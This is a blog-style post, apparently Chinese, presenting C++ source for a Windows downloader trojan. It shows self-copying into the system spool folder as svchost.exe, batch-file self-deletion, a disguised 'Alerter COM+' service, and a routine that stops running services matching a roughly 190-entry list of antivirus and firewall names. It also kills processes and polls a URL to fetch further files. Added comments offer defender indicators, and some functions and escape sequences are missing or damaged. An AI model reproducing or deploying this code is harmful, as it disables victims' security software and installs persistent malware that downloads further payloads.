VC 下载者

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
|注意事项:如欲转载,请保留以下信息。谢谢
|文章出处:
http://hi.baidu.com/_wang8
|>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
上周朋友给了一套教主的vip个人源代码,于是根据需求敲敲打打改成这样。
感叹教主出的确实是同类软件中的精品。
在隐藏与保护方面还是打算从驱动来做;常规穿墙部分因为代码太多,没有加入进程注入。仅当作练习。

// WebDown.cpp : Defines the entry point for the console application.
#include "stdafx.h"
#include "WebDown.h"
#include "winsvc.h"

#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")

#include "time.h"

#include "urlmon.h"
#pragma comment(lib,"urlmon.lib")

#include <tlhelp32.h>


/
// Configuration record compiled into the binary: the URL of the download list and
// the polling interval used by DOWN_thread.
// A commented-out DecryptRecord() call in WinMain takes this struct's address and
// size, which suggests the record is meant to be stored encrypted in other builds
// -- TODO confirm; in this listing it is plain text.
// Defender note: the URL and interval are the values to extract when triaging a
// sample of this family; the URL shown here looks like a placeholder.
struct MODIFY_DATA
{
char DownFile[128];// download file list (URL of the list to fetch)
int WaitTime;// polling interval (minutes)
}modify_data =
{
"
http://www.baidu.com/tmp.txt",
    60,// interval between checks, in minutes
};

// Window handle; nothing in the code shown on this page reads or writes it.
HWND hWnd;
// Timestamps of the download list, held as 8 characters plus NUL.
// DOWN_thread fills DownFileDate2 on every pass and copies it into DownFileDate1
// after a download, so DownFileDate1 is the value last acted on.
char DownFileDate1[9]="00-00-00";
char DownFileDate2[9]="00-00-00";

// Service bookkeeping globals. None of them is used by the functions visible here
// (StopServices declares its own local `scm`); presumably ServiceMain and
// InstallService, defined elsewhere, use them -- TODO confirm.
SERVICE_STATUS service_status_ss;
SERVICE_STATUS_HANDLE handle_service_status;
SC_HANDLE scm,svc;

// Scratch buffer; unused in the code shown on this page.
char test[128];

// Table of service names (193 rows, up to 17 characters plus NUL each) that
// DisplayServices() compares against the name of every enumerated Win32 service;
// a running service that matches is handed to StopServices().
// The entries are names associated with antivirus, personal-firewall and
// monitoring products; "sharedaccess" is the Windows firewall / connection-sharing
// service. Two entries ("NVSVC32", "VSSTAT") are commented out.
// Defender note: this literal list is a stable string indicator for static
// detection, and several of these services stopping in quick succession
// (service state-change events in the System log) is a tamper signal worth alerting on.
char AntiServ[193][18] ={
"ACKWIN32",
"ADVXDWIN",
"ALERTSVC",
"ALOGSERV",
"AMON9X",
"ANTI-TROJAN",
"ANTS",
"apvxdwin",
"ATCON",
"ATUpdateR",
"ATWATCH",
"AUTODOWN",
"AutoTrace",
"AVCONSOL",
"AVGCC32",
"AVGCTRL",
"Avgctrl",
"AVGSERV",
"AvgServ",
"AVGSERV9",
"AVGW",
"avkpop",
"AVKSERV",
"avkservice",
"avkwctl9",
"AVP32",
"AVP32",
"AVPCC",
"AVPCC",
"AVPM",
"AVPM",
"Avsched32",
"AVSYNMGR",
"AvSynMgr",
"AVWINNT",
"AVXMONITOR9X",
"AVXMONITORNT",
"AVXQUAR",
"AVXW",
"BLACKD",
"BLACKICE",
"BlackICE",
"CLAW95",
"CLAW95CF",
"CLEANER",
"CLEANER3",
"CMGRDIAN",
"CONNECTIONMONITOR",
"defscangui",
"DEFWATCH",
"DOORS",
"DVP95",
"EFPEADM",
"ETRUSTCIPE",
"EVPN",
"EXPERT",
"fameh32",
"fch32",
"fih32",
"fnrb32",
"fsaa",
"fsav32",
"fsgk32",
"fsm32",
"fsma32",
"fsmb32",
"gbmenu",
"GENERICS",
"GUARD",
"GUARDDOG",
"HELP",
"IAMAPP",
"IAMSERV",
"ICLOAD95",
"ICLOADNT",
"ICMON",
"ICSUPP95",
"ICSUPPNT",
"IFACE",
"IOMON98",
"ISRV95",
"JEDI",
"LDNETMON",
"LDPROMENU",
"LDSCAN",
"LOCKDOWN",
"LOCKDOWN2000",
"LUALL",
"LUCOMSERVER",
"MCAGENT",
"MCMNHDLR",
"MCSHIELD",
"McShield",
"MCTOOL",
"MCUpdate",
"MCVSRTE",
"MCVSSHLD",
"MGAVRTCL",
"MGAVRTE",
"MGHTML",
"minilog",
"MONITOR",
"MOOLIVE",
"MWATCH",
"NAVAP",
"navapsvc",
"NAVAPW32",
"NAVENG",
"NAVEX15",
"NAVLU32",
"NAVW32",
"NAVWNT",
"NDD32",
"NeoWatchLog",
"NETUTILS",
"ngdbserv",
"NGServer",
"NISSERV",
"NISSERV",
"NISUM",
"NISUM",
"NMAIN",
"NORMIST",
"NPROTECT",
"NPSSVC",
"NSCHED32",
"ntrtscan",
"NTVDM",
"NTXconfig",
"NVC95",
//"NVSVC32",
"NWService",
"NWTOOL16",
"PADMIN",
"pavproxy",
"PCCIOMON",
"pccntmon",
"pccwin97",
"PCCWIN98",
"pcscan",
"PERSFW",
"POP3TRAP",
"POPROXY",
"PORTMONITOR",
"PROCESSMONITOR",
"PROGRAMAUDITOR",
"PROT95",
"PVIEW95",
"RAV7",
"RAV7WIN",
"REALMON",
"RESCUE",
"RTVSCN95",
"sbserv",
"SCAN32",
"SCRSCAN",
"sharedaccess",
"SPHINX",
"SPYXX",
"SS3EDIT",
"STOPW",
"SVW3",
"SWEEP95",
"SweepNet",
"SWEEPSRV",
"SWEEPSRV.SYS",
"SweepUpdate",
"SWNETSUP",
"SymProxySvc",
"SYMTRAY",
"TFAK",
"vbcmserv",
"VbCons",
"VET32",
"VET95",
"VETTRAY",
"VPC32",
"VPTRAY",
"VSCHED",
"VSECOMR",
"VSHWIN32",
"VSMAIN",
"vsmon",
"VSMON",
//"VSSTAT",
"WATCHDOG",
"WEBSCANX",
"WGFE95",
"WIMMUN32",
"WRADMIN",
"WRCTRL",
"ZAPROMINILOG",
"ZONEALARM"

};
//====================================================================
// Terminates processes by executable name.
// Takes a Toolhelp snapshot of all processes, walks it, and for every entry whose
// szExeFile equals processName (case-insensitive CString compare) opens the process
// with PROCESS_TERMINATE and calls TerminateProcess with exit code 0.
// No caller of this function is visible on this page.
// Defender note: a process snapshot followed by PROCESS_TERMINATE opens against
// security-product processes is the behaviour to monitor for; protected processes
// and tamper protection exist to refuse exactly this kind of handle request.
void KillProcess(char * processName)
{
HANDLE   hSnapshot;   
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32   pe;   
Process32First(hSnapshot,&pe);   
do   
{    CString KillProcessName = processName;
        if(KillProcessName.CompareNoCase(pe.szExeFile) == 0)
   {   
    HANDLE   hProcess;   
    hProcess=OpenProcess(PROCESS_TERMINATE,FALSE,pe.th32ProcessID);   
    if(hProcess)   
    {   
     TerminateProcess(hProcess,0);// terminate the process   
    }   
   }   
}     
while(Process32Next(hSnapshot,&pe));   
CloseHandle(hSnapshot);
}

//
// Stop a service.
// Opens the Service Control Manager requesting SC_MANAGER_CREATE_SERVICE, opens
// the service named SvrName with SERVICE_ALL_ACCESS|DELETE, queries its status and,
// unless it already reports SERVICE_STOPPED, sends SERVICE_CONTROL_STOP and then
// sleeps 500 ms. Every failure path returns silently; nothing is reported to the
// caller. DELETE access is requested, but this function does not delete the service.
// Defender note: both calls require administrative rights, so running users without
// them and alerting on unexpected stops of security services limits this routine.
void StopServices(char * SvrName)
{
CString name = SvrName;// copy the name into a CString
SC_HANDLE scm;
SC_HANDLE service;
SERVICE_STATUS status;

if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE))==NULL)
{
   //printf("OpenSCManager Error/n");
   return;
}
service=OpenService(scm,name,SERVICE_ALL_ACCESS|DELETE);
if (!service)
{
   //printf("OpenService error!/n");
   return;
}
BOOL isSuccess=QueryServiceStatus(service,&status);
if (!isSuccess)
{
   //printf("QueryServiceStatus error!/n");
   return;
}
if ( status.dwCurrentState!=SERVICE_STOPPED )
{
  
   isSuccess=ControlService(service,SERVICE_CONTROL_STOP,&status);
   //if (!isSuccess )
   // printf("failed to stop the service!/n");
   //else
   // printf("service stopped successfully!/n");
   Sleep( 500 );
  
}else
{
   //printf("this service is not running!/n");
}

}

// Enumerates Win32 services and stops the running ones whose names match AntiServ.
// Despite the name, nothing is displayed: every printf is commented out.
//
// Steps: open the SCM with SC_MANAGER_ALL_ACCESS, allocate a 64 KB buffer, make a
// single EnumServicesStatus call for SERVICE_WIN32 services in any state, then
// compare each returned service name with rows 0-189 of AntiServ. The comparison is
// case-insensitive and limited to the length of the enumerated service's name, so
// it is a prefix match on the table entry. A match in state SERVICE_RUNNING is
// passed to StopServices().
//
// Returns TRUE when the enumeration loop completed, FALSE when the SCM could not
// be opened, the buffer could not be allocated, or the enumeration call failed.
// Defender note: the prefix match means a legitimate service with a short name can
// be stopped as collateral, which helps explain unrelated service outages on an
// affected host.
BOOL DisplayServices()
{

LPENUM_SERVICE_STATUS lpServices = NULL;
DWORD   nSize = 0;
DWORD   nServicesReturned;
DWORD   nResumeHandle = 0;
DWORD dwServiceType = SERVICE_WIN32;

SC_HANDLE schSCManager = NULL;
BOOL Flag = FALSE;
DWORD   i = 0;
UINT j = 0; // shadowed by the `int j` declared in the inner loop below

schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);


if (schSCManager == NULL) // Fail To Open SCM
{
   //printf("Fail To Open SCM/n");
   return FALSE;
}

lpServices = (LPENUM_SERVICE_STATUS) LocalAlloc(LPTR, 64 * 1024); // Allocate Ram

if (lpServices == NULL) // Fail To Allocate Ram
{
   //printf("Fail To Allocate Ram/n");
   goto CleanUP;
}

// Enum All Service Based On Service Type
if (EnumServicesStatus(schSCManager,
   dwServiceType,
   SERVICE_STATE_ALL,
   (LPENUM_SERVICE_STATUS)lpServices,
   64 * 1024,
   &nSize,
   &nServicesReturned,
   &nResumeHandle) == NULL)
{
   //printf("Fail To Enum Service/n");
   goto CleanUP;
}

// Display The Services
// compare the service names here; stop the service on a match
//printf("%-34s%s/n/n","ServiceName","DisplayName");
for (i = 0; i < nServicesReturned; i++)
{
  
   //printf("%s/n",lpServices[i].lpServiceName); // match against these
   for(int j = 0 ; j < 190;j++)
   {
    if(!_strnicmp(lpServices[i].lpServiceName,AntiServ[j],strlen(lpServices[i].lpServiceName)))
    {
     //printf("FindServer:%s/n",lpServices[i].lpServiceName);
     if (lpServices[i].ServiceStatus.dwCurrentState == SERVICE_RUNNING)
     {
      //printf("STOPServer:%s/n",lpServices[i].lpServiceName);
      StopServices(lpServices[i].lpServiceName);
     }
    }
   
   }
  
}
Flag = TRUE;

// Close Service Handle,Free Allocated Ram And Return To The Caller
CleanUP:
CloseServiceHandle(schSCManager);
if (lpServices != NULL)
{
   LocalFree(lpServices);
}

// Blocks until a character arrives on stdin; looks like a leftover from console
// testing -- confirm.
getchar ();

return Flag;

}


//

// Worker loop: service sweep, then poll the download list, then sleep; never returns.
// dParam is unused. What starts this thread is not visible on this page.
//
// Each pass calls DisplayServices(), then GetDownFileDate() (defined elsewhere) to
// fill DownFileDate2 for the configured URL. If the first 8 characters differ from
// DownFileDate1, DownFiles() (defined elsewhere) is called on the same URL and the
// new date is remembered. The loop then sleeps modify_data.WaitTime minutes.
// Defender note: the network signature is a request to one fixed URL at a fixed
// interval, followed by a burst of downloads only when the list changes; egress
// filtering and proxy logs showing that periodicity are the place to catch it.
unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{
while(1)
{
   //MessageBox(NULL,"STOP SERVER","TODO",MB_OK);
   /// first scan the services once and stop any that match; WIN32 services only
   DisplayServices();

   if(GetDownFileDate(modify_data.DownFile,DownFileDate2))// store the timestamp of the download list file in Date2
   {
    if (strncmp(DownFileDate1,DownFileDate2,8)!=0)// the download list timestamp differs
    {// meaning the files need to be downloaded
     DownFiles(modify_data.DownFile);// download every file in the list
     //DownExec(modify_data.DownFile);// download file
     strcpy(DownFileDate1,DownFileDate2);
    }
   }
   Sleep(modify_data.WaitTime*60*1000);// once every WaitTime minutes
}

return 0;
}

//***********************************************// self-delete
// Removes the running executable from disk by way of a helper batch file.
// Writes rs.bat into the temp directory, then starts the command interpreter
// (%comspec% /c) with the batch path and this module's path as arguments. The batch
// clears the file attributes of its first argument, deletes it, repeats while the
// file still exists, and finally deletes itself. Nothing happens if the batch file
// cannot be created.
// The escape sequences in the string literals below appear as "/" on this page;
// that is extraction damage, left as found.
// Defender note: the artifacts are a short-lived rs.bat in the temp directory and
// a command-interpreter child started with DETACHED_PROCESS whose command line
// carries both paths; process-creation logging with command lines captures it.
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s//rs.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
   // The batch body is written with a hard-coded length of 94 bytes.
   WriteFile(f,"@echo off/r/n"
    ":kill/r/n"
    "attrib -a -r -s -h /"%1/"/r/n"
    "del /F /"%1/"/r/n"
    "if exist /"%1/" goto kill/r/n"
    "del /F /"%0/"/r/n"
    ,94, &r,NULL
    );
   CloseHandle(f);


  
   memset(&sinfo, 0, sizeof(STARTUPINFO));
   sinfo.cb = sizeof(sinfo);
   sinfo.wShowWindow = SW_HIDE;
   memset(This_File,0,sizeof(This_File));
   GetModuleFileName(NULL, This_File, sizeof(This_File));
   sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
   ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
  
   // execute the batch file
   CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
}
}

// Program entry point: relocate the executable, then run as a service.
//
// 1. Builds <system directory> + the spool/svchost.exe suffix shown below (the
//    path separators are extraction-damaged on this page) and compares it with the
//    path of the running module, ignoring case.
// 2. If they differ: deletes any file at the target, copies this executable there
//    (returns -1 if the copy fails), starts the copy, calls uninstall() to remove
//    the original, and exits.
// 3. Otherwise registers a service table entry named "Alerter COM+" with
//    ServiceMain (defined elsewhere). If StartServiceCtrlDispatcher fails -- the
//    author's comment treats that as the first run -- InstallService() (defined
//    elsewhere) is called.
// Returns nRetCode, which is always 0 on the paths that return normally.
// Defender note: the host indicators are an executable named svchost.exe inside
// the spool subdirectory rather than in the system directory itself, and a service
// table entry named "Alerter COM+"; whether InstallService registers the service
// under that same name is not visible here -- confirm against the full sample.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;

/// self-copy ----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"
//spool//svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));

if (_stricmp(This_File,filename)!=0)
{
   DeleteFile(filename);
   if(::CopyFile(This_File,filename,FALSE)==0) return -1;
   PROCESS_INFORMATION pinfo;
   STARTUPINFO sinfo;  
   memset(&pinfo,0,sizeof(pinfo));
   memset(&sinfo,0,sizeof(sinfo));
   CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
   uninstall();
   ExitProcess(0);
}

// decryption step commented out: it has to be removed for unit testing, the data is not encrypted
//DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"4321");

// service entry table -----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; // thread name (this field is the service name)
service_tab_entry[0].lpServiceProc=ServiceMain; // thread entry address
// there may be several entries; the last one must be NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
    
if (StartServiceCtrlDispatcher(service_tab_entry)==0)// first run
{
   InstallService();
}
  
return nRetCode;
}

/***********************************************/
